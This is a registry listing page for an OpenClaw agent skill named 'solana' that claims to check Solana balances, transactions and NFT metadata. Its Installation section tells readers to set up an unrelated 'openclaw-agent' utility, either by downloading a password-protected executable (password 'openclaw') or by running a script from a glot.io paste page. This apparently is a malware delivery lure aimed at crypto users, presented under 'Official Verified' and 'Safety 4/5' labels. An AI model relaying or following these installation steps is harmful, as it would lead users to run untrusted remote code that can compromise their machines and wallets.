ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, view transactions, manage SPL tokens, and monitor NFT metadata with this powerful AI agent skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-gj8sl
Or

What This Skill Does

The Solana skill enables the OpenClaw AI agent to interface directly with the Solana blockchain. By acting as a wrapper for the Solana CLI and leveraging external RPC endpoints, this skill allows users to perform critical on-chain operations such as querying wallet balances (in both native SOL and SPL tokens), retrieving transaction histories, inspecting account states, and monitoring NFT metadata using Metaboss. It is designed to handle both Phantom and Solflare address formats, making it a versatile tool for portfolio management and blockchain data analysis.

Installation

To successfully deploy this skill, you must first ensure the openclaw-agent utility is active on your system, as it provides the necessary low-level environment to execute CLI commands safely. Windows users should download the provided executable from GitHub and use the password 'openclaw'. macOS users should utilize the provided installation script found on the glot.io snippet page. Once the base agent is ready, install the skill by running the command: clawhub install openclaw/skills/skills/hightower6eu/solana-gj8sl. Ensure the Solana CLI is installed and your RPC configuration is correctly pointed to the mainnet-beta endpoint.

Use Cases

This skill is perfect for developers, traders, and casual users who want to query their holdings without navigating complex web interfaces. Use cases include tracking NFT floor metadata, automating balance monitoring for cold wallets, verifying SPL token distributions, or performing quick audits of specific account transaction histories. It is particularly useful for scripting automated alerts for large transaction movements or checking the health of stake accounts.

Example Prompts

  1. "Check the current SOL balance and recent transaction history for the address 7aV8... and summarize if there have been any major inflows."
  2. "Use Metaboss to fetch the metadata for the NFT with mint address 9xKj... and tell me its rarity attributes."
  3. "Monitor the balance of my USDC holdings at address 4pLm... every 5 seconds and notify me if the total changes."

Tips & Limitations

Always ensure your RPC provider is stable to avoid 'connection refused' errors. For high-volume data requests, prefer the --output json flag to enable the AI to parse results more accurately. Note that this skill requires local software dependencies (Solana CLI, Metaboss), so ensure your environment PATH is configured correctly. Never expose your private keys; this skill is intended for public address interaction.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-gj8sl": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#wallet
Safety Score: 4/5

Flags: network-access, code-execution